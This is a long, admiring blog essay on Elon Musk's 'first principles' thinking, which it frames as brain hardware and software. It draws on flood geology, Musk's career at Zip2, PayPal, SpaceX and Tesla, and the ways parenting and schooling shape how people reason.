Welcome to the last post in the series on the world of Elon Musk.
It’s been a long one, I know. A long series with long posts and a long time between posts. It turns out that when it comes to Musk and his shit, there was a lot to say.
Anyone who’s read the first three posts in this series is aware that I’ve not only been buried in the things Musk is doing, I’ve been drinking a tall glass of the Elon Musk Kool-Aid throughout. I’m very, very into it.
I kind of feel like that’s fine, right? The dude is a steel-bending industrial giant in America in a time when there aren’t supposed to be steel-bending industrial giants in America, igniting revolutions in huge, old industries that aren’t supposed to be revolutionable. After emerging from the 1990s dotcom party with $180 million, instead of sitting back in his investor chair listening to pitches from groveling young entrepreneurs, he decided to start a brawl with a group of 900-pound sumo wrestlers—the auto industry, the oil industry, the aerospace industry, the military-industrial complex, the energy utilities—and he might actually be winning. And all of this, it really seems, for the purpose of giving our species a better future.
Pretty Kool-Aid worthy. But someone being exceptionally rad isn’t Kool-Aid worthy enough to warrant 90,000 words over a string of months on a blog that’s supposed to be about a wide range of topics.
During the first post, I laid out the two objectives for the series:
1) To understand why Musk is doing what he’s doing.
2) To understand why Musk is able to do what he’s doing.
So far, we’ve spent most of the time exploring objective #1. But what really intrigued me as I began thinking about this was objective #2. I’m fascinated by those rare people in history who manage to dramatically change the world during their short time here, and I’ve always liked to study those people and read their biographies. Those people know something the rest of us don’t, and we can learn something valuable from them. Getting access to Elon Musk gave me what I decided was an unusual chance to get my hands on one of those people and examine them up close. If it were just Musk’s money or intelligence or ambition or good intentions that made him so capable, there would be more Elon Musks out there. No, it’s something else—what TED curator Chris Anderson called Musk’s “secret sauce”—and for me, this series became a mission to figure it out.
The good news is, after a lot of time thinking about this, reading about this, and talking to him and his staff, I think I’ve got it. What for a while was a large pile of facts, observations, and sound bites eventually began to congeal into a common theme—a trait in Musk that I believe he shares with many of the most dynamic icons in history and that separates him from almost everybody else.
As I worked through the Tesla and SpaceX posts, this concept kept surfacing, and it became clear to me that this series couldn’t end without a deep dive into exactly what it is that Musk and a few others do so unusually well. The thing that tantalized me was that this secret sauce is actually accessible to everyone and right there in front of us—if we can just wrap our heads around it. Mulling this all over has legitimately affected the way I think about my life, my future, and the choices I make—and I’m going to try my best in this post to explain why.
Two Kinds of Geology
In 1681, English theologian Thomas Burnet published Sacred Theory of the Earth, in which he explained how geology worked. What happened was, around 6,000 years ago, the Earth was formed as a perfect sphere with a surface of idyllic land and a watery interior. But then, when the surface dried up a little later, cracks formed in it, releasing much of the water from within. The result was the Biblical Deluge and Noah having to deal with a ton of shit all week. Once things settled down, the Earth was no longer a perfect sphere—all the commotion had distorted the surface, bringing about mountains and valleys and caves down below, and the whole thing was littered with the fossils of the flood’s victims.
And bingo. Burnet had figured it out. The great puzzle of fundamental theology had been to reconcile the large number of seemingly-very-old Earth features with the much shorter timeline of the Earth detailed in the Bible. For theologians of the time, it was their version of the general relativity vs. quantum mechanics quandary, and Burnet had come up with a viable string theory to unify it all under one roof.
It wasn’t just Burnet. There were enough theories kicking around reconciling geology with the verses of the Bible to warrant what is today a 15,000-word “Flood Geology” Wikipedia page.
Around the same time, another group of thinkers started working on the geology puzzle: scientists.
For the theologian puzzlers, the starting rules of the game were, “Fact: the Earth began 6,000 years ago and there was at one point an Earth-sweeping flood,” and their puzzling took place strictly within that context. But the scientists started the game with no rules at all. The puzzle was a blank slate where any observations and measurements they found were welcome.
Over the next 300 years, the scientists built theory upon theory, and as new technologies brought in new types of measurements, old theories were debunked and replaced with updated versions. The science community kept surprising itself as the apparent age of the Earth grew longer and longer. In 1907, there was a huge breakthrough when American scientist Bertram Boltwood pioneered the technique of deciphering the age of rocks through radiometric dating, which identifies elements in a rock that decay radioactively at a known rate and measures what portion of those elements remains intact and what portion has already converted into decay products.
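For the curious, here’s a back-of-the-envelope version of what that calculation looks like (a rough sketch with made-up numbers; real geochronology has to correct for complications like daughter atoms that were already in the rock when it formed):

```python
import math

def radiometric_age(parent_atoms, daughter_atoms, half_life_years):
    """Estimate a rock's age from how much of a radioactive parent element
    has decayed into its daughter element, assuming a closed system with
    no daughter atoms present when the rock formed."""
    decay_constant = math.log(2) / half_life_years
    original_parent = parent_atoms + daughter_atoms
    return math.log(original_parent / parent_atoms) / decay_constant

# If about half of a sample's uranium-238 (half-life ~4.5 billion years)
# has decayed away, the sample is roughly one half-life old.
print(radiometric_age(parent_atoms=50, daughter_atoms=50, half_life_years=4.5e9))
# roughly 4.5 billion years
```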
Radiometric dating blew Earth’s history backwards into the billions of years, which opened the door to new breakthroughs in science like the theory of continental drift, which in turn led to the theory of plate tectonics. The scientists were on a roll.
Meanwhile, the flood geologists would have none of it. To them, any conclusions from the science community were moot because they were breaking the rules of the game to begin with. The Earth was officially less than 6,000 years old, so if radiometric dating showed otherwise, it was a flawed technique, period.
But the scientific evidence grew increasingly compelling, and as time wore on, more and more flood geologists threw in the towel and accepted the scientists’ viewpoint—maybe they had had the rules of the game wrong.
Some, though, held strong. The rules were the rules, and it didn’t matter how many people agreed that the Earth was billions of years old—it was a grand conspiracy.
Today, there are still many flood geologists making their case. Just recently, an author named Tom Vail wrote a book called Grand Canyon: A Different View, in which he explains:
Contrary to what is widely believed, radioactive dating has not proven the rocks of the Grand Canyon to be millions of years old. The vast majority of the sedimentary layers in the Grand Canyon were deposited as the result of a global flood that occurred after and as a result of the initial sin that took place in the Garden of Eden.
If the website analytics stats on Chartbeat included a “Type of Geologist” demographic metric, I imagine that for Wait But Why readers, the breakdown would look something like this:
Geology Breakdown
It makes sense. Whether religious or not, most people who read this site are big on data, evidence, and accuracy. I’m reminded of this every time I make an error in a post.
Whatever role faith plays in the spiritual realm, what most of us agree on is that when seeking answers to our questions about the age of the Earth, the history of our species, the causes of lightning, or any other physical phenomenon in the universe, data and logic are far more effective tools than faith and scripture.
And yet—after thinking about this for a while, I’ve come to an unpleasant conclusion:
When it comes to most of the way we think, the way we make decisions, and the way we live our lives, we’re much more like the flood geologists than the science geologists.
And Elon’s secret? He’s a scientist through and through.
Hardware and Software
The first clue to the way Musk thinks is in the super odd way that he talks. For example:
Human child: “I’m scared of the dark, because that’s when all the scary shit is gonna get me and I won’t be able to see it coming.”
Elon: “When I was a little kid, I was really scared of the dark. But then I came to understand, dark just means the absence of photons in the visible wavelength—400 to 700 nanometers. Then I thought, well it’s really silly to be afraid of a lack of photons. Then I wasn’t afraid of the dark anymore after that.”2
Or:
Human father: “I’d like to start working less because my kids are starting to grow up.”
Elon: “I’m trying to throttle back, because particularly the triplets are starting to gain consciousness. They’re almost two.”3
Or:
Human single man: “I’d like to find a girlfriend. I don’t want to be so busy with work that I have no time for dating.”
Elon: “I would like to allocate more time to dating, though. I need to find a girlfriend. That’s why I need to carve out just a little more time. I think maybe even another five to 10 — how much time does a woman want a week? Maybe 10 hours? That’s kind of the minimum? I don’t know.”4
I call this MuskSpeak. MuskSpeak is a language that describes everyday parts of life as exactly what they actually, literally are.
There are plenty of technical situations where we all agree that MuskSpeak makes much more sense than normal human parlance—
Heart Surgery
—but what makes Musk odd is that he thinks about most things in MuskSpeak, including many areas where you don’t usually find it. Like when I asked him if he was afraid of death, and he said having kids made him more comfortable with dying, because “kids sort of are a bit you. At least they’re half you. They’re half you at the hardware level, and depending on how much time you have with them, they’re that percentage of you at the software level.”
When you or I look at kids, we see small, dumb, cute people. When Musk looks at his five kids, he sees five of his favorite computers. When he looks at you, he sees a computer. And when he looks in the mirror, he sees a computer—his computer. It’s not that Musk suggests that people are just computers—it’s that he sees people as computers on top of whatever else they are.
And at the most literal level, Elon’s right about people being computers. At its simplest definition, a computer is an object that can store and process data—which the brain certainly is.
And while this isn’t the most poetic way to think about our minds, I’m starting to believe that it’s one of those areas of life where MuskSpeak can serve us well—because thinking of a brain as a computer forces us to consider the distinction between our hardware and our software, a distinction we often fail to recognize.
For a computer, hardware is defined as “the machines, wiring, and other physical components of a computer.” So for a human, that’s the physical brain they were born with and all of its capabilities, which determines their raw intelligence, their innate talents, and other natural strengths and shortcomings.
A computer’s software is defined as “the programs and other operating information used by a computer.” For a human, that’s what they know and how they think—their belief systems, thought patterns, and reasoning methods. Life is a flood of incoming data of all kinds that enter the brain through our senses, and it’s the software that assesses and filters all that input, processes and organizes it, and ultimately uses it to generate the key output—a decision.
The hardware is a ball of clay that’s handed to us when we’re born. And of course, not all clay is equal—each brain begins as a unique combination of strengths and weaknesses across a wide range of processes and capabilities.
But it’s the software that determines what kind of tool the clay gets shaped into.
When people think about what makes someone like Elon Musk so effective, they often focus on the hardware—and Musk’s hardware has some pretty impressive specs. But the more I learn about Musk and other people who seem to have superhuman powers—whether it be Steve Jobs, Albert Einstein, Henry Ford, Genghis Khan, Marie Curie, John Lennon, Ayn Rand, or Louis C.K.—the more I’m convinced that it’s their software, not their natural-born intelligence or talents, that makes them so rare and so effective.
So let’s talk about software—starting with Musk’s. As I wrote the other three posts in this series, I looked at everything I was learning about Musk—the things he says, the decisions he makes, the missions he takes on and how he approaches them—as clues to how his underlying software works.
Eventually, the clues piled up and the shape of the software began to reveal itself. Here’s what I think it looks like:
Elon’s Software
The structure of Musk’s software starts like many of ours, with what we’ll call the Want box:
Software - Want Box
This box contains anything in life where you want Situation A to turn into Situation B. Situation A is currently what’s happening and you want something to change so that Situation B is what’s happening instead. Some examples:
Wants
Next, the Want box has a partner in crime—what we’ll call the Reality box. It contains all things that are possible:
Software - Reality Box
Pretty straightforward.
The overlap of the Want and Reality boxes is the Goal Pool, where your goal options live:2
Software - Goal Pool
So you pick a goal from the pool—the thing you’re going to try to move from Point A to Point B.
And how do you cause something to change? You direct your power towards it. A person’s power can come in various forms: your time, your energy (mental and physical), your resources, your persuasive ability, your connection to others, etc.
The concept of employment is just Person A using their resources power (a paycheck) to direct Person B’s time and/or energy power toward Person A’s goal. When Oprah publicly recommends a book, that’s combining her abundant power of connection (she has a huge reach) and her abundant power of persuasion (people trust her) and directing them towards the goal of getting the book into the hands of thousands of people who would have otherwise never known about it.
Once a goal has been selected, you know the direction in which to point your power. Now it’s time to figure out the most effective way to use that power to generate the outcome you want—that’s your strategy:
Software - Strategy Box
Simple, right? And probably not that different from how you think.
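If you want to see the structure at its most MuskSpeak-literal, here’s a toy version in code (all of the contents are invented; the point is just the shape):

```python
# A toy model of the goal formation mechanism described above.
# The Goal Pool is simply the overlap of the Want box and the Reality box.
want_box = {"help humanity's future", "work on cutting-edge tech", "learn to teleport"}
reality_box = {"work on cutting-edge tech", "start an internet company", "get a PhD"}

goal_pool = want_box & reality_box      # things you want that are actually possible
goal = next(iter(goal_pool))            # pick a goal from the pool to point your power at
strategy = "the most effective way to use my power to achieve: " + goal

print(goal_pool)    # {'work on cutting-edge tech'}
print(strategy)
```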
But what makes Musk’s software so effective isn’t its structure, it’s that he uses it like a scientist. Carl Sagan said, “Science is a way of thinking much more than it is a body of knowledge,” and you can see Musk apply that way of thinking in two key ways:
1) He builds each software component himself, from the ground up.
Musk calls this “reasoning from first principles.” I’ll let him explain:
I think generally people’s thinking process is too bound by convention or analogy to prior experiences. It’s rare that people try to think of something on a first principles basis. They’ll say, “We’ll do that because it’s always been done that way.” Or they’ll not do it because “Well, nobody’s ever done that, so it must not be good.” But that’s just a ridiculous way to think. You have to build up the reasoning from the ground up—“from the first principles” is the phrase that’s used in physics. You look at the fundamentals and construct your reasoning from that, and then you see if you have a conclusion that works or doesn’t work, and it may or may not be different from what people have done in the past.
In science, this means starting with what evidence shows us to be true. A scientist doesn’t say, “Well we know the Earth is flat because that’s the way it looks, that’s what’s intuitive, and that’s what everyone agrees is true,” a scientist says, “The part of the Earth that I can see at any given time appears to be flat, which would be the case when looking at a small piece of many differently shaped objects up close, so I don’t have enough information to know what the shape of the Earth is. One reasonable hypothesis is that the Earth is flat, but until we have tools and techniques that can be used to prove or disprove that hypothesis, it is an open question.”
A scientist gathers together only what he or she knows to be true—the first principles—and uses those as the puzzle pieces with which to construct a conclusion.
Reasoning from first principles is a hard thing to do in life, and Musk is a master at it. Brain software has four major decision-making centers:
1) Filling in the Want box
2) Filling in the Reality box
3) Goal selection from the Goal Pool
4) Strategy formation
Musk works through each of these boxes by reasoning from first principles. Filling in the Want box from first principles requires a deep, honest, and independent understanding of yourself. Filling in the Reality box requires the clearest possible picture of the actual facts of both the world and your own abilities. The Goal Pool should double as a Goal Selection Laboratory that contains tools for intelligently measuring and weighing options. And strategies should be formed based on what you know, not on what is typically done.
2) He continually adjusts each component’s conclusions as new information comes in.
You might remember doing proofs in geometry class, one of the most mundane parts of everyone’s childhood. Like these:
Given: A = B
Given: B = C + D
Therefore: A = C + D
Math is satisfyingly exact. Its givens are exact and its conclusions are airtight.
In math, we call givens “axioms,” and axioms are 100% true. So when we build conclusions out of axioms, we call them “proofs,” which are also 100% true.
Science doesn’t have axioms or proofs, for good reason.
We could have called Newton’s law of universal gravitation a proof—and for a long time, it certainly seemed like one—but then what happens when Einstein comes around and shows that Newton was actually “zoomed in,” like someone calling the Earth flat, and that when you zoom way out, the real law is general relativity, with Newton’s law breaking down under extreme conditions while general relativity seems to work no matter what? So then, you’d call general relativity a proof instead. Except then what happens when quantum mechanics comes along and shows that general relativity fails on a tiny scale and that a new set of laws is needed to account for those cases?
There are no axioms or proofs in science because nothing is for sure and everything we feel sure about might be disproven. Richard Feynman has said, “Scientific knowledge is a body of statements of varying degrees of certainty—some most unsure, some nearly sure, none absolutely certain.” Instead of proofs, science has theories. Theories are based on hard evidence and treated as truths, but at all times they’re susceptible to being adjusted or disproven as new data emerges.
So in science, it’s more like:
Given (for now): A = B
Given (for now): B = C + D
Therefore (for now): A = C + D
In our lives, the only true axiom is “I exist.” Beyond that, nothing is for sure. And for most things in life, we can’t even build a real scientific theory because life doesn’t tend to have exact measurements.
Usually, the best we can do is a strong hunch based on what data we have. And in science, a hunch is called a hypothesis. Which works like this:
Given (it seems, based on what I know): A = B
Given (it seems, based on what I know): B = C + D
Therefore (it seems, based on what I know): A = C + D
Hypotheses are built to be tested. Testing a hypothesis can disprove it or strengthen it, and if it passes enough tests, it can be upgraded to a theory.
So after Musk builds his conclusions from first principles, what does he do? He tests the shit out of them, continually, and adjusts them regularly based on what he learns. Let’s go through the whole process to show how:
You begin by reasoning from first principles to A) fill in the Want box, B) fill in the Reality box, C) select a goal from the pool, and D) build a strategy—and then you get to work. You’ve used first principles thinking to decide where to point your power and the most effective way to use it.
But the goal-achievement strategy you came up with was just your first crack. It was a hypothesis, ripe for testing. You test a strategy hypothesis one way: action. You pour your power into the strategy and see what happens. As you do this, data starts flowing in—results, feedback, and new information from the outside world. Certain parts of your strategy hypothesis might be strengthened by this new data, others might be weakened, and new ideas may have sprung to life in your head through the experience—but either way, some adjustment is usually called for:
Software - Strategy Loop
As this strategy loop spins and your power becomes more and more effective at accomplishing your goal, other things are happening down below.
For someone reasoning from first principles, the Want box at any given time is a snapshot of their innermost desires the last time they thought hard about it. But the contents of the Want box are also a hypothesis, and experience can show you that you were wrong about something you thought you wanted or that you want something you didn’t realize you did. At the same time, the inner you isn’t a statue—it’s a shifting, morphing sculpture whose innermost values change as time passes. So even if something in the Want box was correct at one point, as you change, it may lose its place in the box. The Want box should serve the current inner you as best possible, which requires you to update it, something you do through reflection:
Software - Want Loop
A rotating Want loop is called evolution.
On the other side of the aisle, the Reality box is also going through a process. “Things that are possible” is a hypothesis, maybe more so than anything else. It takes into account both the state of the world and your own abilities. And not only do your own abilities change and grow, but the world changes even faster. What was possible in the world in 2005 is very different from what’s possible today, and it’s a huge (and rare) advantage to be working with an up-to-date Reality box.
Filling in your Reality box from first principles is a great challenge, and keeping the box current so that it matches actual reality takes continual work.
Software - Reality Loop
For each of these areas, the box represents the current hypothesis and the circle represents the source of new information that can be used to adjust the hypothesis.
In the science world, the circle is truth, which scientists access by mining for new information in laboratories, studies, and experiments.
Science Loop
New information-mining is happening all the time and hypotheses and theories are in turn being revised regularly.
In life, it’s our duty to remember that the circles are the boss, not the boxes—the boxes are only trying their best to do the circles proud. And if we fall out of touch with what’s happening in the circles, the info in the boxes becomes obsolete and a less effective source for our decision-making.
Thinking about the software as a whole, let’s take a step back. What we see is a goal formation mechanism below and a goal attainment mechanism above. One thing goal attainment often requires is laser focus. To get the results we want, we zoom in on the micro picture, sinking our teeth into our goal and homing in on it with our strategy loop.
But as time passes, the Want box and Reality box adjust contents and morph shape, and eventually, something else can happen—the Goal Pool changes.
The Goal Pool is just the overlap of the Want and Reality boxes, so its own shape and contents are totally dependent on the state of those boxes. And as you live your life inside the goal attainment mechanism above, it’s important to make sure that what you’re working so hard on remains in line with the Goal Pool below—so let’s add in two big red arrows for that:
Software - Full
Checking in with the large circle down below requires us to lift our heads up from the micro mission and do some macro reflection. And when enough changes happen in the Want and Reality boxes that the goal you’re pursuing is no longer in the goal pool, it calls for a macro life change—a breakup, a job switch, a relocation, a priority swap, an attitude shift.
All together, the software I’ve described is a living, breathing system, constructed on a rock solid foundation of first principles, and built to be nimble, to keep itself honest, and to change shape as needed to best serve its owner.
And if you read about Elon Musk’s life, you can watch this software in action.
How Musk’s software wrote his life story
Getting started
Step 1 for Elon was filling in the contents of the Want box. Doing this from first principles is a huge challenge—you have to dig deep into concepts like right and wrong, good and bad, important and valuable, frivolous and trivial. You have to figure out what you respect, what you disdain, what fascinates you, what bores you, and what excites you deep in your inner child. Of course, there’s no way for anyone of any age to have a clear cut answer to these questions, but Elon did the best thing he could by ignoring others and independently pondering.
I talked with him about his early thought process in figuring out what to do with his career. He has said many times that he cares deeply about the future well-being of the human species—something that is clearly in the center of his Want box. I asked how he came to that, and he explained:
The thing that I care about is—when I look into the future, I see the future as a series of branching probability streams. So you have to ask, what are we doing to move down the good stream—the one that’s likely to make for a good future? Because otherwise, you look ahead, and it’s like “Oh it’s dark.” If you’re projecting to the future, and you’re saying “Wow, we’re gonna end up in some terrible situation,” that’s depressing.
Fair. Homing in on his specific path, I brought up the great modern physicists like Einstein and Hawking and Feynman, and I asked him whether he had considered going into scientific discovery instead of engineering. His response:
I certainly admire the discoveries of the great scientists. They’re discovering what already exists—it’s a deeper understanding of how the universe already works. That’s cool—but the universe already sort of knows that. What matters is knowledge in a human context. What I’m trying to ensure is that knowledge in a human context is still possible in the future. So it’s sort of like—I’m more like the gardener, and then there are the flowers. If there’s no garden, there’s no flowers. I could try to be a flower in the garden, or I could try to make sure there is a garden. So I’m trying to make sure there is a garden, such that in the future, many Feynmans may bloom.
In other words, both A and B are good, but without A there is no B. So I choose A.
He went on:
I was at one point thinking about doing physics as a career—I did undergrad in physics—but in order to really advance physics these days, you need the data. Physics is fundamentally governed by the progress of engineering. This debate—“Which is better, engineers or scientists? Aren’t scientists better? Wasn’t Einstein the smartest person?”—personally, I think that engineering is better because in the absence of the engineering, you do not have the data. You just hit a limit. And yeah, you can be real smart within the context of the limit of the data you have, but unless you have a way to get more data, you can’t make progress. Like look at Galileo. He engineered the telescope—that’s what allowed him to see that Jupiter had moons. The limiting factor, if you will, is the engineering. And if you want to advance civilization, you must address the limiting factor. Therefore, you must address the engineering.
A and B are both good, but B can only advance if A advances. So I choose A.
In thinking about where exactly to point himself to best help humanity, Musk says that in college, he thought hard about the first principles question, “What will most affect the future of humanity?” and put together a list of five things: “the internet; sustainable energy; space exploration, in particular the permanent extension of life beyond Earth; artificial intelligence; and reprogramming the human genetic code.”5
Hearing him talk about what matters to him, you can see up and down the whole stack of Want box reasoning that led him to his current endeavors.
He has other reasons too. Next to wanting to help humanity in the Want box is this quote:
I’m interested in things that change the world or affect the future, and in wondrous new technology where you see it and you’re like, “How did that even happen? How is that possible?”
This follows a theme of Musk being passionate about super-advanced technology and the excitement it brings to him and other people. So an ideal endeavor for Musk would be something to do with engineering, something in an area that will be important for the future, and something to do with cutting-edge technology. Those broad, basic Want box items alone narrow down the goal pool considerably.
Meanwhile, he was a teenager with no money, reputation, or connections, and limited knowledge and skills. In other words, his Reality box wasn’t that big. So he did what many young people do—he focused his early goals not around achieving his Wants, but expanding the Reality box and its list of “things that are possible.” He wanted to be able to legally stay in the US after college, and he also wanted to gain more knowledge about engineering, so he killed two birds with one stone and applied to a PhD program at Stanford to study high energy density capacitors, a technology aimed at coming up with a more efficient way than traditional batteries to store energy.
U-turn to the internet
Musk had gone into the Goal Pool and picked the Stanford program, and he moved to California to get started. But there was one thing—it was 1995. The internet was in the early stages of taking off and moving much faster than people had anticipated. It was also a world he could dive into without money or a reputation. So Musk added a bunch of internet-related possibilities into his Reality box. The early internet was also more exciting than he had anticipated—so getting involved in it quickly found its way into his Want box.
These rapid adjustments caused big changes in his Goal Pool, to the point where the Stanford PhD was no longer what his software’s goal formation center was outputting.
Most people would have stuck with the Stanford program—because they had already told everyone about it and it would be weird to quit, because it was Stanford, because it was a more normal path, because it was safer, because the internet might be a fad, because what if he were 35 one day and was a failure with no money because he couldn’t get a good job without the right degree.
Musk quit the program after two days. The big macro arrow of his software came down on the right and showed him that what he was embarking on wasn’t in the Goal Pool anymore, and he trusted his software—so he made a macro change.
He and his brother started Zip2, an early cross between the concepts of the Yellow Pages and Google Maps. Four years later, they sold the company and Elon walked away with $22 million.
Now that he was a dotcom millionaire, conventional wisdom said he should settle down as a lifelong rich guy and either invest in other companies or start something new with other people’s money.
But Musk’s goal formation center had other ideas. His Want box was bursting with ambitious startup ideas that he thought could have major impact on the world, and his Reality box, which now included $22 million, told him that he had a high chance of succeeding. Being leisurely on the sidelines was nowhere in his Want box and totally unnecessary according to his Reality box.
So he used his newfound wealth to start X.com in 1999, with the vision to build a full-service online financial institution. The internet was still young and the concept of storing your money in an online bank was totally inconceivable to most people, and Musk was advised by many that it was a crazy plan. But again, Musk trusted his software. What he knew about the internet told him that this was inside the Reality box—because his reasoning told him that when it came to the internet, the Reality box had grown much bigger than people realized—and that was all he needed to know to move forward. In the top part of his software, as his strategy-action-results-adjustments loop spun, X.com’s service changed, the team changed, the mission changed, even the name changed. By the time eBay bought it in 2002, the company was called PayPal and it was a money transfer service. Musk made $180 million.
Following his software to space
Now 31 years old and fabulously wealthy, Musk had to figure out what to do next with his life. On top of the “whatever you do, definitely don’t risk losing that money you have” conventional wisdom, there was also the common logic that said, “You’re awesome at building internet companies, but that’s all you know since you’ve never done anything else. You’re in your thirties now and it’s too late to do something big in a whole different field. This is the path you chose—you’re an internet guy.”
But Musk went back to first principles. He looked inwards to his Want box, and having reflected on things, doing another internet thing wasn’t really in the box anymore. What was in there was his still-burning desire to help the future of humanity. In particular, he felt that to have a long future, the species would have to become much better at space travel.
So he started exploring the limits of the Reality box when it came to getting involved in the aerospace industry.
Conventional wisdom screamed at the top of its lungs for him to stop. It said he had no formal education in the field and didn’t know the first thing about being a rocket scientist. But his software told him that formal education was just another way to download information into your brain and “a painfully slow download” at that—so he started reading, meeting people, and asking questions.
Conventional wisdom said no entrepreneur had ever succeeded at an endeavor like this before, and that he shouldn’t risk his money on something so likely to fail. But Musk’s stated philosophy is, “When something is important enough, you do it even if the odds are not in your favor.”
Conventional wisdom said that he couldn’t afford to build rockets because they were too expensive, pointing to the fact that no one had ever made a rocket that cheaply before—but like the scientists who ignored those who said the Earth was 6,000 years old and those who insisted the Earth was flat, Musk started crunching the numbers himself. Here’s how he recounts his thoughts:
Historically, all rockets have been expensive, so therefore, in the future, all rockets will be expensive. But actually that’s not true. If you say, what is a rocket made of? It’s made of aluminum, titanium, copper, carbon fiber. And you can break it down and say, what is the raw material cost of all these components? And if you have them stacked on the floor and could wave a magic wand so that the cost of rearranging the atoms was zero, then what would the cost of the rocket be? And I was like, wow, okay, it’s really small—it’s like 2% of what a rocket costs. So clearly it would be in how the atoms are arranged—so you’ve got to figure out how can we get the atoms in the right shape much more efficiently. And so I had a series of meetings on Saturdays with people, some of whom were still working at the big aerospace companies, just to try to figure out if there’s some catch here that I’m not appreciating. And I couldn’t figure it out. There doesn’t seem to be any catch. So I started SpaceX.6
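Run that argument with made-up numbers and you can see why it got his attention (illustrative figures only, not SpaceX’s actual accounting):

```python
# Back-of-the-envelope version of the first-principles argument above.
# (Illustrative numbers only.)
typical_rocket_price = 100_000_000      # what a launch has historically cost, in dollars
raw_material_fraction = 0.02            # Musk's ~2% figure for the raw materials

raw_material_cost = typical_rocket_price * raw_material_fraction
arranging_the_atoms = typical_rocket_price - raw_material_cost

print(raw_material_cost)     # ~$2 million: the aluminum, titanium, copper, carbon fiber
print(arranging_the_atoms)   # ~$98 million: everything that's fair game for rethinking
```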
History, conventional wisdom, and his friends all said one thing, but his own software, reasoning upwards from first principles, said another—and he trusted his software. He started SpaceX, again with his own money, and dove in head first. The mission: dramatically lower the cost of space travel to make it possible for humanity to become multi-planetary.
Tesla and beyond
Two years later, while running a growing SpaceX, a friend brought Elon to a company called AC Propulsion, which had created a prototype for a super-fast, long-range electric car. It blew him away. The Reality box of Musk’s software had told him that such a thing wasn’t yet possible, but it turns out that Musk wasn’t aware of how far lithium-ion batteries had advanced, and what he saw at AC Propulsion was new information about the world that put “starting a top-notch electric car company” into the Reality box in his head.
He ran into the same conventional wisdom about battery costs as he had about rocket costs. Batteries had never been made cheaply enough to allow for a mass-market, long-range electric car because battery prices were simply too high and always would be. He used the same first principles logic and a calculator to determine that most of the problem was middlemen, not raw materials, and decided that actually, conventional wisdom was wrong and batteries could be much cheaper in the future. So he co-founded Tesla with the mission of accelerating the advent of a mostly-electric-vehicle world—first by pouring in resources power and funding the company, and later by contributing his time and energy as well and becoming CEO.
Two years after that, he and his cousins co-founded SolarCity, a company whose goal was to revolutionize energy production by creating a large, distributed utility that would install solar panel systems on millions of people’s homes. Musk knew that his time/energy power—the one kind of power that has hard limits, no matter who you are—was mostly used up, but he still had plenty of resources power, so he put it to work on another goal in his Goal Pool.
Most recently, Musk has jumpstarted change in another area that’s important to him—the way people transport themselves from city to city. His idea is that there should be an entirely new mode of transport that will whiz people hundreds of miles by zinging them through a tube. He calls it the Hyperloop. For this project, he’s not using his time, energy, or resources. Instead, by laying out his initial thoughts in a white paper and hosting a competition for engineers to test out their innovations, he’s leveraging his powers of connection and persuasion to create change.
There are all kinds of tech companies that build software. They think hard, for years, about the best, most efficient way to make their product. Musk sees people as computers, and he sees his brain software as the most important product he owns—and since there aren’t companies out there designing brain software, he designed his own, beta tests it every day, and makes constant updates. That’s why he’s so outrageously effective, why he can disrupt multiple huge industries at once, why he can learn so quickly, strategize so cleverly, and visualize the future so clearly.
This part of what Musk does isn’t rocket science—it’s common sense. Your entire life runs on the software in your head—why wouldn’t you obsess over optimizing it?
And yet, not only do most of us not obsess over our own software—most of us don’t even understand our own software, how it works, or why it works that way. Let’s try to figure out why.
Most People’s Software
You always hear facts about human development and how so much of who you become is determined by your experiences during your formative years. A newborn’s brain is a malleable ball of hardware clay, and its job upon being born is to quickly learn about whatever environment it’s been born into and start shaping itself into the optimal tool for survival in those circumstances. That’s why it’s so easy for young children to learn new skills.
As people age, the clay begins to harden and it becomes more difficult to change the way the brain operates. My grandmother has been using a computer as long as I have, but I use mine comfortably and easily because my malleable childhood brain easily wrapped itself around basic computer skills, while she has the same face on when she uses her computer that my tortoise does when I put him on top of a glass table and he thinks he’s inexplicably hovering two feet above the ground. She’ll use a computer when she needs to, but it’s not her friend.
So when it comes to our brain software—our values, perceptions, belief systems, reasoning techniques—what are we learning during those key early years?
Everyone’s raised differently, but for most people I know, it went something like this:
We were taught all kinds of things by our parents and teachers—what’s right and wrong, what’s safe and dangerous, the kind of person you should and shouldn’t be. But the idea was: I’m an adult, so I know much more about this than you, it’s not up for debate, don’t argue, just obey. That’s when the cliché “Why?” game comes in (or, in MuskSpeak, “the chained why”).
A child’s instinct isn’t just to learn what to do and not to do—she wants to understand the rules of her environment. And to understand something, you have to have a sense of how that thing was built. When parents and teachers tell a kid to do XYZ and to simply obey, it’s like installing a piece of already-designed software in the kid’s head. When kids ask Why? and then Why? and then Why?, they’re trying to deconstruct that software to see how it was built—to get down to the first principles underneath so they can weigh how much they should actually care about what the adults seem so insistent upon.
The first few times a kid plays the Why game, parents think it’s cute. But many parents, and most teachers, soon come up with a way to cut the game off:
Because I said so.
“Because I said so” inserts a concrete floor into the child’s deconstruction effort below which no further Why’s may pass. It says, “You want first principles? There. There’s your floor. No more Why’s necessary. Now fucking put your boots on because I said so and let’s go.”
Imagine how this would play out in the science world.
Higgs Hawking comic (panels 1–10)
In fairness, parents’ lives suck. They have to do all the shit they used to have to do, except now on top of that there are these self-obsessed, drippy little creatures they have to upkeep, who think parents exist to serve them. On a busy day, in a bad mood, with 80 things to do, the Why game is a nightmare.
But it might be a nightmare worth enduring. A command or a lesson or a word of wisdom that comes without any insight into the steps of logic it was built upon is feeding a kid a fish instead of teaching them to reason. And when that’s the way we’re brought up, we end up with a bucket of fish and no rod—a piece of installed software that we’ve learned how to use, but no ability to code anything ourselves.
School makes things worse. One of my favorite thinkers, writer Seth Godin (whose blog is bursting with first principles reasoning wisdom), explains in a TED Talk that the current education system is a product of the Industrial Age, a time that catapulted productivity and the standard of living. But along with many more factories came the need for many more factory workers, so our education system was redesigned around that goal. He explains:
The deal was: universal public education whose sole intent was not to train the scholars of tomorrow—we had plenty of scholars. It was to train people to be willing to work in the factory. It was to train people to behave, to comply, to fit in. “We process you for a whole year. If you are defective, we hold you back and process you again. We sit you in straight rows, just like they organize things in the factory. We build a system all about interchangeable people because factories are based on interchangeable parts.”
Couple that concept with what another favorite writer of mine, James Clear, explained recently on his blog:
In the 1960s, a creative performance researcher named George Land conducted a study of 1,600 five-year-olds and 98 percent of the children scored in the “highly creative” range. Dr. Land re-tested each subject during five year increments. When the same children were 10-years-old, only 30 percent scored in the highly creative range. This number dropped to 12 percent by age 15 and just 2 percent by age 25. As the children grew into adults they effectively had the creativity trained out of them. In the words of Dr. Land, “non-creative behavior is learned.”
